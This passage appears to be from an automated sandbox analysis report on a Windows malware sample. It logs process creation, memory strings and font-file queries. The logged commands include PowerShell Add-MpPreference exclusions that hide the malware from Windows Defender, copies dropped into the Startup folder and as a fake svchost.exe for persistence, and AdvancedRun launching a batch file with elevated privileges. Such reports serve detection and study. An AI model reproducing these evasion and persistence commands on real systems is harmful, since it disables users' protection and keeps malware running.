                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Users\user\Desktop\VknMvPoCXZ.exe VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
